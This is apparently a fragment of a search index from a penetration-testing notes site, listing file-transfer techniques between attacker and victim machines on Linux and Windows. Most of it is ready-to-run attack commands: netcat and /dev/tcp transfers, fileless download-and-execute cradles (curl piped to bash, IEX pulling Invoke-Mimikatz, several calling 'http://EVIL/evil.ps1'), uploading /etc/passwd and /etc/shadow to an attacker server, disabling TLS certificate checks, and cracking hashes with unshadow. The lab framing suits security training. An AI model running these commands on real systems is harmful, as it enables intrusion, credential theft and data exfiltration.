    On the server side (attacking machine):

    #data will be printed on screen\nnc -lvp <port>  \n

    On the client side (victim's machine):

    echo \"hello\" | nc -v $ip <port>\n
    ","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#transfer-data-and-save-it-in-a-file-with-netcat","title":"Transfer data and save it in a file with netcat","text":"","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#victims-machine-listening-on-port","title":"Victim's Machine listening on <Port>","text":"

    On the client side (victim's machine):

    ncat -lvp <port> --recv-only > received.txt  \n# --recv-only: an Ncat flag that closes the connection once the file transfer is finished.\n

    On the server side (attacking machine):

    # Data will be stored in the received.txt file\ncat tobesentfile.txt | nc -v $ip <port>\n\n# Alternative: the option -q 0 tells Netcat to close the connection once it finishes\nnc -q 0 $ipVictim <port> < tobesentfile.txt \n\nncat --send-only $ipVictim <port> < tobesentfile.txt \n# The --send-only flag, when used in both connect and listen modes, prompts Ncat to terminate once its input is exhausted.\n
    ","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#victims-machine-connects-to-netcat-only-to-receive-the-file","title":"Victim's machine connects to netcat only to receive the file","text":"

    Instead of listening on our compromised machine, we can connect to a port on our attack host to perform the file transfer operation. This method is useful in scenarios where there's a firewall blocking inbound connections. Let's listen on port 443 on our Pwnbox and send the file SharpKatz.exe as input to Netcat.

    On the server side (attacking machine):

    sudo nc -l -p 443 -q 0 < tobesentfile.txt\n\nncat -l -p 443 --send-only < tobesentfile.txt\n

    On the client side (victim's machine), the compromised machine connects to Netcat to receive the file:

    nc $ipAttacker 443 > tobesentfile.txt\n\nncat $ipAttacker 443 --recv-only > tobesentfile.txt\n\n# Using /dev/tcp to Receive the File\ncat < /dev/tcp/192.168.49.128/443 > SharpKatz.exe\n
    ","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#powershell-session-file-transfer","title":"PowerShell Session File Transfer","text":"

    PowerShell Remoting uses Windows Remote Management (WinRM), which is the Microsoft implementation of the Web Services for Management (WS-Management) protocol, to allow users to run PowerShell commands on remote computers.

    To create a PowerShell Remoting session on a remote computer, we will need administrative access, be a member of the Remote Management Users group, or have explicit permissions for PowerShell Remoting in the session configuration.

    Let's create an example and transfer a file from DC01 to DATABASE01 and vice versa.

    PS C:\\htb> whoami\n\nhtb\\administrator\n\nPS C:\\htb> hostname\n\nDC01\n
    Test-NetConnection -ComputerName DATABASE01 -Port 5985\n\nComputerName     : DATABASE01\nRemoteAddress    : 192.168.1.101\nRemotePort       : 5985\nInterfaceAlias   : Ethernet0\nSourceAddress    : 192.168.1.100\nTcpTestSucceeded : True\n

    Because this session already has privileges over DATABASE01, we don't need to specify credentials.

    Create a PowerShell Remoting Session to DATABASE01

    PS C:\\htb> $Session = New-PSSession -ComputerName DATABASE01\n

    We can use the Copy-Item cmdlet to copy a file from our local machine DC01 to the DATABASE01 session stored in $Session, or vice versa.

    Copy samplefile.txt from our Localhost to the DATABASE01 Session

    PS C:\\htb> Copy-Item -Path C:\\samplefile.txt -ToSession $Session -Destination C:\\Users\\Administrator\\Desktop\\\n

    Copy DATABASE.txt from DATABASE01 Session to our Localhost

    PS C:\\htb> Copy-Item -Path \"C:\\Users\\Administrator\\Desktop\\DATABASE.txt\" -Destination C:\\ -FromSession $Session\n
    ","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#rdp","title":"RDP","text":"

    RDP (Remote Desktop Protocol) is commonly used in Windows networks for remote access.

    We can use xfreerdp or rdesktop to transfer files by mounting a Linux folder. This share will allow us to transfer files to and from the RDP session.

    ","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#mounting-a-linux-folder-using-rdesktop","title":"Mounting a Linux Folder Using rdesktop","text":"
    rdesktop $ipVictim -d <domain> -u <username> -p <'Password0@'> -r disk:linux=\"/home/user/rdesktop/files\"\n
    ","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#mounting-a-linux-folder-using-xfreerdp","title":"Mounting a Linux Folder Using xfreerdp","text":"

    xfreerdp /v:$ipVictim /d:<domain> /u:<username> /p:<'Password0@'> /drive:linux,/home/plaintext/htb/academy/filetransfer

    To access the directory, we can connect to \\\\tsclient\\ in Windows, allowing us to transfer files to and from the RDP session.

    ","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-linux/","title":"Transferring files techniques - Linux","text":"","tags":["linux","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-linux/#replicating-client-server","title":"Replicating client-server","text":"","tags":["linux","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-linux/#1-setting-up-a-server-in-the-attacking-machine","title":"1. Setting up a server in the attacking machine","text":"

    See different techniques

    ","tags":["linux","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-linux/#2-download-files-from-victims-machine","title":"2. Download files from victim's machine","text":"","tags":["linux","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-linux/#wget","title":"wget","text":"
    wget http://<SERVERIP>:<SERVERPORT>/<file>\n
    ","tags":["linux","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-linux/#curl","title":"curl","text":"
    curl http://<SERVERIP>:<SERVERPORT>/<file> -o <OutputNameForFile>\n
    ","tags":["linux","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-linux/#fileless-downloads-using-linux","title":"Fileless downloads using Linux","text":"

    Because of the way Linux works and how pipes operate, most of the tools we use in Linux can be used to replicate fileless operations, which means that we don't have to download a file to execute it.

    ","tags":["linux","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-linux/#fileless-download-with-curl","title":"Fileless Download with cURL","text":"
    curl https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh | bash\n
    ","tags":["linux","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-linux/#fileless-download-with-wget","title":"Fileless Download with wget","text":"
    wget -qO- https://raw.githubusercontent.com/juliourena/plaintext/master/Scripts/helloworld.py | python3\n
    ","tags":["linux","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-linux/#bash-downloads","title":"Bash downloads","text":"

    On the server side (attacking machine), setup a server by using one of the methodologies applied above.

    On the client side (victim's machine):

    # Connecting to the Target Webserver (attacking machine serving the file)\nexec 3<>/dev/tcp/$ip/80\n\n# Requesting the file to the server \necho -e \"GET /file.sh HTTP/1.1\\n\\n\">&3\n\n# Printing the Response\ncat <&3\n
    ","tags":["linux","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-linux/#ssh-downloads-and-uploads-scp","title":"SSH downloads and uploads: SCP","text":"

    The SSH implementation comes with an SCP utility for remote file transfer that, by default, uses the SSH protocol.

    Two requirements:

    • we have SSH user credentials on the remote host
    • SSH is open on port 22

    On the server's side (attacker's machine):

    # Enable the service\nsudo systemctl enable ssh\n\n# Start the server\nsudo systemctl start ssh\n\n# Check if port is listening\nnetstat -lnpt\n

    From the attacker machine too:

    # Download the file foobar.txt saved on the victim's machine. The command is run from the attacker machine, connecting to the remote host (victim's machine)\nscp username@$IPvictim:foobar.txt /some/local/directory\n\n# Upload the file foo.txt saved on the attacker machine to the victim's. The command is run from the attacker machine, connecting to the remote host (victim's machine)\nscp foo.txt username@$IPvictim:/some/remote/directory\n
    ","tags":["linux","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-linux/#base64","title":"Base64","text":"

    To avoid firewall protections we can:

    1. Base64 encode the file:

    base64 file.php -w 0\n\n# Alternative\ncat file |base64 -w 0;echo\n

    2. Copy the base64 string; on the remote host, decode it and pipe it into a file:

    echo -n \"Looooooong-string-encoded-in-base64\" | base64 -d > file.php\n# -n: do not output the trailing newline\n
    ","tags":["linux","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-linux/#web-upload","title":"Web upload","text":"

    We can use uploadserver.

    # Install\npython3 -m pip install --user uploadserver\n\n# As we will use https, we will create a self-signed certificate. This file should be hosted in a different location from the web server folder\nopenssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server'\n\n# Start the web server\npython3 -m uploadserver 443 --server-certificate /location/different/folder/server.pem\n\n# Now from our compromised machine, let's upload the `/etc/passwd` and `/etc/shadow` files.\ncurl -X POST https://$attackerIP/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecure\n# We used the option --insecure because we used a self-signed certificate that we trust.\n
    ","tags":["linux","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-linux/#backdoors","title":"Backdoors","text":"

    See reverse shells, bind shells, and web shells.

    ","tags":["linux","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/","title":"Transferring files techniques - Windows","text":"

    See the different techniques to set up a server on the attacking machine, typically a Kali box.

    ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#powershell-base64-encode-decode","title":"PowerShell Base64 Encode & Decode","text":"","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#upload-from-linux-attacker-to-windows-victim","title":"Upload from linux (attacker) to Windows (victim)","text":"

    If we have access to a terminal, we can encode a file to a base64 string, copy its contents from the terminal, and perform the reverse operation, decoding the string back into the original file.

    # In attacker machine, check SSH Key MD5 Hash\nmd5sum id_rsa\n\n# In attacker machine, encode SSH Key to Base64\ncat id_rsa |base64 -w 0;echo\n\n\n# Copy output and paste it into the Windows PowerShell terminal in the victim's machine\nPS C:\\lala> [IO.File]::WriteAllBytes(\"C:\\Users\\Public\\id_rsa\", [Convert]::FromBase64String(\"LS0tLS1CRUdJTiBPUEVOU1NIIFBSSVZBVEUgS0VZLS0tLS0KYjNCbGJuTnphQzFyWlhrdGRqRUFBQUFBQkc1dmJtVUFBQUFFYm05dVpRQUFBQUFBQUFBQkFBQUFsd0FBQUFkemMyZ3RjbgpOaEFBQUFBd0VBQVFBQUFJRUF6WjE0dzV1NU9laHR5SUJQSkg3Tm9Yai84YXNHRUcxcHpJbmtiN2hIMldRVGpMQWRYZE9kCno3YjJtd0tiSW56VmtTM1BUR3ZseGhDVkRRUmpBYzloQ3k1Q0duWnlLM3U2TjQ3RFhURFY0YUtkcXl0UTFUQXZZUHQwWm8KVWh2bEo5YUgxclgzVHUxM2FRWUNQTVdMc2JOV2tLWFJzSk11dTJONkJoRHVmQThhc0FBQUlRRGJXa3p3MjFwTThBQUFBSApjM05vTFhKellRQUFBSUVBeloxNHc1dTVPZWh0eUlCUEpIN05vWGovOGFzR0VHMXB6SW5rYjdoSDJXUVRqTEFkWGRPZHo3CmIybXdLYkluelZrUzNQVEd2bHhoQ1ZEUVJqQWM5aEN5NUNHblp5SzN1Nk40N0RYVERWNGFLZHF5dFExVEF2WVB0MFpvVWgKdmxKOWFIMXJYM1R1MTNhUVlDUE1XTHNiTldrS1hSc0pNdXUyTjZCaER1ZkE4YXNBQUFBREFRQUJBQUFBZ0NjQ28zRHBVSwpFdCtmWTZjY21JelZhL2NEL1hwTlRsRFZlaktkWVFib0ZPUFc5SjBxaUVoOEpyQWlxeXVlQTNNd1hTWFN3d3BHMkpvOTNPCllVSnNxQXB4NlBxbFF6K3hKNjZEdzl5RWF1RTA5OXpodEtpK0pvMkttVzJzVENkbm92Y3BiK3Q3S2lPcHlwYndFZ0dJWVkKZW9VT2hENVJyY2s5Q3J2TlFBem9BeEFBQUFRUUNGKzBtTXJraklXL09lc3lJRC9JQzJNRGNuNTI0S2NORUZ0NUk5b0ZJMApDcmdYNmNoSlNiVWJsVXFqVEx4NmIyblNmSlVWS3pUMXRCVk1tWEZ4Vit0K0FBQUFRUURzbGZwMnJzVTdtaVMyQnhXWjBNCjY2OEhxblp1SWc3WjVLUnFrK1hqWkdqbHVJMkxjalRKZEd4Z0VBanhuZEJqa0F0MExlOFphbUt5blV2aGU3ekkzL0FBQUEKUVFEZWZPSVFNZnQ0R1NtaERreWJtbG1IQXRkMUdYVitOQTRGNXQ0UExZYzZOYWRIc0JTWDJWN0liaFA1cS9yVm5tVHJRZApaUkVJTW84NzRMUkJrY0FqUlZBQUFBRkhCc1lXbHVkR1Y0ZEVCamVXSmxjbk53WVdObEFRSURCQVVHCi0tLS0tRU5EIE9QRU5TU0ggUFJJVkFURSBLRVktLS0tLQo=\"))\n\n# Confirming the MD5 Hashes Match with  Get-FileHash cmdlet\nPS C:\\lala> Get-FileHash C:\\Users\\Public\\id_rsa -Algorithm md5\n

    More about the Get-FileHash cmdlet.

    The Windows command-line utility (cmd.exe) has a maximum string length of 8,191 characters. Also, a web shell may error if you attempt to send extremely large strings.
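    To stay under that limit, we can pre-split the base64 string on the attacker side and append it chunk by chunk on the target. A minimal sketch, assuming hypothetical filenames:

    # Encode the file and split it into 4000-character chunks (well under the 8,191-character limit)\nbase64 -w 0 payload.bin | fold -w 4000 > chunks.txt\n\n# On the target, append each line in order (echo <chunk> >> payload.b64),\n# then rebuild the file there, e.g. with: certutil -decode payload.b64 payload.bin\n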

    ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#download-from-windows-victim-to-linux-attacker","title":"Download from Windows (victim) to linux (attacker)","text":"

    In the victim's machine (windows):

    # Encode File Using PowerShell\n[Convert]::ToBase64String((Get-Content -path \"C:\\Windows\\system32\\drivers\\etc\\hosts\" -Encoding byte))\n\n\nGet-FileHash \"C:\\Windows\\system32\\drivers\\etc\\hosts\" -Algorithm MD5 | select Hash\n

    In the attacker's machine (Linux): We copy this content and paste it into our attack host, use the base64 command to decode it, and use the md5sum application to confirm the transfer happened correctly.

    echo IyBDb3B5cmlnaHQgKGMpIDE5OTMtMjAwOSBNaWNyb3NvZnQgQ29ycC4NCiMNCiMgVGhpcyBpcyBhIHNhbXBsZSBIT1NUUyBmaWxlIHVzZWQgYnkgTWljcm9zb2Z0IFRDUC9JUCBmb3IgV2luZG93cy4NCiMNCiMgVGhpcyBmaWxlIGNvbnRhaW5zIHRoZSBtYXBwaW5ncyBvZiBJUCBhZGRyZXNzZXMgdG8gaG9zdCBuYW1lcy4gRWFjaA0KIyBlbnRyeSBzaG91bGQgYmUga2VwdCBvbiBhbiBpbmRpdmlkdWFsIGxpbmUuIFRoZSBJUCBhZGRyZXNzIHNob3VsZA0KIyBiZSBwbGFjZWQgaW4gdGhlIGZpcnN0IGNvbHVtbiBmb2xsb3dlZCBieSB0aGUgY29ycmVzcG9uZGluZyBob3N0IG5hbWUuDQojIFRoZSBJUCBhZGRyZXNzIGFuZCB0aGUgaG9zdCBuYW1lIHNob3VsZCBiZSBzZXBhcmF0ZWQgYnkgYXQgbGVhc3Qgb25lDQojIHNwYWNlLg0KIw0KIyBBZGRpdGlvbmFsbHksIGNvbW1lbnRzIChzdWNoIGFzIHRoZXNlKSBtYXkgYmUgaW5zZXJ0ZWQgb24gaW5kaXZpZHVhbA0KIyBsaW5lcyBvciBmb2xsb3dpbmcgdGhlIG1hY2hpbmUgbmFtZSBkZW5vdGVkIGJ5IGEgJyMnIHN5bWJvbC4NCiMNCiMgRm9yIGV4YW1wbGU6DQojDQojICAgICAgMTAyLjU0Ljk0Ljk3ICAgICByaGluby5hY21lLmNvbSAgICAgICAgICAjIHNvdXJjZSBzZXJ2ZXINCiMgICAgICAgMzguMjUuNjMuMTAgICAgIHguYWNtZS5jb20gICAgICAgICAgICAgICMgeCBjbGllbnQgaG9zdA0KDQojIGxvY2FsaG9zdCBuYW1lIHJlc29sdXRpb24gaXMgaGFuZGxlZCB3aXRoaW4gRE5TIGl0c2VsZi4NCiMJMTI3LjAuMC4xICAgICAgIGxvY2FsaG9zdA0KIwk6OjEgICAgICAgICAgICAgbG9jYWxob3N0DQo= | base64 -d > hosts\n\n\nmd5sum hosts \n
    ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#certutil","title":"Certutil","text":"

    It's possible to download a file with certutil:

    certutil.exe -urlcache -split -f \"https://download.sysinternals.com/files/PSTools.zip\" pstools.zip\n
    ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#powershell-systemnetwebclient","title":"PowerShell System.Net.WebClient","text":"

    PowerShell offers many file transfer options. In any version of PowerShell, the System.Net.WebClient class can be used to download a file over HTTP, HTTPS or FTP.

    The following table describes WebClient methods for downloading data from a resource:

    • OpenRead : Returns the data from a resource as a Stream.
    • OpenReadAsync : Returns the data from a resource without blocking the calling thread.
    • DownloadData : Downloads data from a resource and returns a Byte array.
    • DownloadDataAsync : Downloads data from a resource and returns a Byte array without blocking the calling thread.
    • DownloadFile : Downloads data from a resource to a local file.
    • DownloadFileAsync : Downloads data from a resource to a local file without blocking the calling thread.
    • DownloadString : Downloads a String from a resource and returns a String.
    • DownloadStringAsync : Downloads a String from a resource without blocking the calling thread.
    ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#powershell-downloadstring-fileless-method","title":"PowerShell DownloadFile Method","text":"
    # Example: (New-Object Net.WebClient).DownloadFile('<Target File URL>','<Output File Name>')\nPS C:\\lala> (New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1','C:\\Users\\Public\\Downloads\\PowerView.ps1')\n# Net.WebClient: class name\n# DownloadFile: method\n\n\n# Example: (New-Object Net.WebClient).DownloadFileAsync('<Target File URL>','<Output File Name>')\nPS C:\\lala> (New-Object Net.WebClient).DownloadFileAsync('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1', 'PowerViewAsync.ps1')\n# Net.WebClient: class name\n# DownloadFileAsync: method\n
    ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#powershell-downloadstring-fileless-method_1","title":"PowerShell DownloadString - Fileless Method","text":"

    PowerShell can also be used to perform fileless attacks. Instead of downloading a PowerShell script to disk, we can run it directly in memory using the Invoke-Expression cmdlet or the alias IEX.

    PS C:\\lala> IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')\n

    IEX also accepts pipeline input.

    PS C:\\lala> (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1') | IEX\n
    ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#powershell-invoke-webrequest","title":"PowerShell Invoke-WebRequest","text":"

    From PowerShell 3.0 onwards, the Invoke-WebRequest cmdlet is also available. This cmdlet gets content from a web page on the internet. We can use the aliases iwr, curl, and wget instead of the Invoke-WebRequest full name.

    Invoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 -OutFile PowerView.ps1\n# alias: `iwr`, `curl`, and `wget`\n
    ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#more-downloading-techniques","title":"More downloading techniques","text":"

    From Harmj0y:

    # normal download cradle\nIEX (New-Object Net.Webclient).downloadstring(\"http://EVIL/evil.ps1\")\n\n# PowerShell 3.0+\nIEX (iwr 'http://EVIL/evil.ps1')\n\n# hidden IE com object\n$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r\n\n# Msxml2.XMLHTTP COM object\n$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://EVIL/evil.ps1',$false);$h.send();iex $h.responseText\n\n# WinHttp COM object (not proxy aware!)\n$h=new-object -com WinHttp.WinHttpRequest.5.1;$h.open('GET','http://EVIL/evil.ps1',$false);$h.send();iex $h.responseText\n\n# using bitstransfer- touches disk!\nImport-Module bitstransfer;Start-BitsTransfer 'http://EVIL/evil.ps1' $env:temp\\t;$r=gc $env:temp\\t;rm $env:temp\\t; iex $r\n\n# DNS TXT approach from PowerBreach (https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerBreach/PowerBreach.ps1)\n#   code to execute needs to be a base64 encoded string stored in a TXT record\nIEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(((nslookup -querytype=txt \"SERVER\" | Select -Pattern '\"*\"') -split '\"'[0]))))\n\n# from @subtee - https://gist.github.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d\n<#\n<?xml version=\"1.0\"?>\n<command>\n   <a>\n      <execute>Get-Process</execute>\n   </a>\n  </command>\n#>\n$a = New-Object System.Xml.XmlDocument\n$a.Load(\"https://gist.githubusercontent.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d/raw/1ffde429dc4a05f7bc7ffff32017a3133634bc36/gistfile1.txt\")\n$a.command.a.execute | iex\n
    ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#bypassing-techniques","title":"Bypassing techniques","text":"","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#the-parameter-usebasicparsing","title":"The parameter -UseBasicParsing","text":"

    There may be cases when the Internet Explorer first-launch configuration has not been completed, which prevents the download.

    Invoke-WebRequest https://<ip>/PowerView.ps1 -UseBasicParsing | IEX\n
    ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#ssltls-secure-channel","title":"SSL/TLS secure channel","text":"

    Another error in PowerShell downloads is related to the SSL/TLS secure channel if the certificate is not trusted. We can bypass that error with the following command:

    # With this command we get the error Exception calling \"DownloadString\" with \"1\" argument(s): \"The underlying connection was closed: Could not establish trust relationship for the SSL/TLS secure channel.\"\nIEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')\n\n##### To bypass it, first run\n[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}\n
    ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#powershell-web-uploads","title":"PowerShell Web Uploads","text":"

    First, we launch a web server on our attacker machine. We can use uploadserver.

    # Install a Configured WebServer with Upload\npip3 install uploadserver\n\n# Run web server\npython3 -m uploadserver\n

    From the victim's machine (Windows), we load the PSUpload.ps1 helper with IEX and upload the file with Invoke-FileUpload:

    # PowerShell Script to Upload a File to Python Upload Server\nIEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')\n\nInvoke-FileUpload -Uri http://$ipServer:8000/upload -File C:\\Windows\\System32\\drivers\\etc\\hosts\n
    ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#powershell-base64-web-upload","title":"PowerShell Base64 Web Upload","text":"

    Another way to use PowerShell and base64 encoded files for upload operations is by using Invoke-WebRequest or Invoke-RestMethod together with Netcat.

    $b64 = [System.convert]::ToBase64String((Get-Content -Path 'C:\\Windows\\System32\\drivers\\etc\\hosts' -Encoding Byte))\n\nInvoke-WebRequest -Uri http://$ipServer:8000/ -Method POST -Body $b64\n

    From the attacker machine:

    # We catch the base64 data with Netcat and use base64 with the decode option to convert the string back into the file.\nnc -lvnp 8000\n\necho <base64> | base64 -d > hosts\n
    ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#smb-downloads","title":"SMB Downloads","text":"","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#simple-smbserver","title":"Simple SMBserver","text":"

    From attacker machine, we can use smbserver.py:

    # First, we create an SMB server in our attacker machine (linux) with smbserver from Impacket \n\nsudo impacket-smbserver share -smb2support /tmp/smbshare\n

    From the Windows machine (the victim's), copy the file from the SMB server:

    copy \\\\$ipServer\\share\\nc.exe\n

    If the copy is blocked because the organization's security policies forbid unauthenticated guest access, create the SMB server with a username and password.

    ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#smbserver-with-authentication","title":"SMBServer with authentication","text":"

    From attacker machine, we can use smbserver.py:

    sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password test\n

    From the victim's machine (the Windows one):

    # mount the SMB Server with Username and Password\nnet use n: \\\\$ipServer\\share /user:test test\n\n# Copy the file\ncopy n:\\nc.exe\n
    ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#smb-uploads","title":"SMB Uploads","text":"

    Enterprises commonly don't allow the SMB protocol (TCP/445) out of their internal network because this can open them up to potential attacks.

    An alternative is to run SMB over HTTP with WebDav. WebDAV is an extension of HTTP, the internet protocol that web browsers and web servers use to communicate with each other. The WebDAV protocol enables a webserver to behave like a fileserver, supporting collaborative content authoring. WebDAV can also use HTTPS.

    When you use SMB, it will first attempt to connect using the SMB protocol, and if there's no SMB share available, it will try to connect using HTTP.

    ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#configuring-webdav-server","title":"Configuring WebDav Server","text":"

    To set up our WebDav server, we need to install two Python modules, wsgidav and cheroot.

    pip install wsgidav cheroot\n
    sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous \n
    ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#connect-to-the-server-and-the-share-from-windows","title":"Connect to the server and the share from windows","text":"

    Now we can attempt to connect to the share using the DavWWWRoot directory.

    # DavWWWRoot is a special keyword recognized by the Windows Shell. No such folder exists on your WebDAV server. \nC:\\lala> dir \\\\$ipServer\\DavWWWRoot\n\n# Upload files with SMB\ncopy C:\\Users\\john\\Desktop\\SourceCode.zip \\\\$ipServer\\DavWWWRoot\\\n

    If there are no SMB (TCP/445) restrictions, you can use impacket-smbserver the same way we set it up for download operations.

    ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#ftp-downloads","title":"FTP Downloads","text":"","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#pyftpdlib-module","title":"pyftpdlib module","text":"

    Configure an FTP Server in our attack host using Python3 pyftpdlib module:

    sudo pip3 install pyftpdlib\n

    Then we can specify port number 21 because, by default, pyftpdlib uses port 2121. Anonymous authentication is enabled by default if we don't set a user and password.

    sudo python3 -m pyftpdlib --port 21\n

    We can use the FTP client or PowerShell Net.WebClient to download files from an FTP server.

    (New-Object Net.WebClient).DownloadFile('ftp://$ipServer/file.txt', 'ftp-file.txt')\n

    When we get a shell on a remote machine, we may not have an interactive shell, so we can script the Windows FTP client with a command file. Example:

    C:\\htb> echo open 192.168.49.128 > ftpcommand.txt\nC:\\htb> echo USER anonymous >> ftpcommand.txt\nC:\\htb> echo binary >> ftpcommand.txt\nC:\\htb> echo GET file.txt >> ftpcommand.txt\nC:\\htb> echo bye >> ftpcommand.txt\nC:\\htb> ftp -v -n -s:ftpcommand.txt\nftp> open 192.168.49.128\nLog in with USER and PASS first.\nftp> USER anonymous\n\nftp> GET file.txt\nftp> bye\n\nC:\\htb>more file.txt\nThis is a test file\n
    ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#ftp-uploads","title":"FTP Uploads","text":"","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#run-pyftpdlib-a-ftp-server","title":"Run pyftpdlib, a FTP server","text":"

    We will use the pyftpdlib module with the option --write to allow clients to upload files to our attack host.

    sudo python3 -m pyftpdlib --port 21 --write\n
    ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#powershell-upload-file","title":"PowerShell Upload File","text":"
    (New-Object Net.WebClient).UploadFile('ftp://192.168.49.128/ftp-hosts', 'C:\\Windows\\System32\\drivers\\etc\\hosts')\n
    ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#create-a-command-file-for-the-ftp-client-to-upload-a-file","title":"Create a Command File for the FTP Client to Upload a File","text":"

    Example:

    C:\\htb> echo open 192.168.49.128 > ftpcommand.txt\nC:\\htb> echo USER anonymous >> ftpcommand.txt\nC:\\htb> echo binary >> ftpcommand.txt\nC:\\htb> echo PUT c:\\windows\\system32\\drivers\\etc\\hosts >> ftpcommand.txt\nC:\\htb> echo bye >> ftpcommand.txt\nC:\\htb> ftp -v -n -s:ftpcommand.txt\nftp> open 192.168.49.128\n\nLog in with USER and PASS first.\n\n\nftp> USER anonymous\nftp> PUT c:\\windows\\system32\\drivers\\etc\\hosts\nftp> bye\n
    ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"unshadow/","title":"unshadow","text":"

    unshadow - combines passwd and shadow files

    ","tags":["bash"]},{"location":"unshadow/#brute-forcing-etcpasswd-and-etcshadow","title":"Brute forcing /etc/passwd and /etc/shadow","text":"

    First, save the /etc/passwd and /etc/shadow files from the victim machine to the attacker machine.

    Second, use unshadow to put users and passwords in the same file:

    unshadow passwd shadow > crackme\n# passwd: file saved with /etc/passwd content.\n# shadow: file saved with /etc/shadow content.\n

    Third, run John the Ripper or hashcat to crack the hashes (see the example below).
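    For example, assuming sha512crypt hashes (adjust the hashcat mode to the actual hash type found in crackme):

    # John the Ripper\njohn --wordlist=/usr/share/wordlists/rockyou.txt crackme\njohn --show crackme\n\n# hashcat: -m 1800 is sha512crypt; --username skips the user field in the unshadowed file\nhashcat -m 1800 --username crackme /usr/share/wordlists/rockyou.txt\n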

    ","tags":["bash"]},{"location":"uploadserver/","title":"uploadserver","text":"

    Python's http.server extended to include a file upload page

    ","tags":["file transfer technique","server"]},{"location":"uploadserver/#installation","title":"Installation","text":"

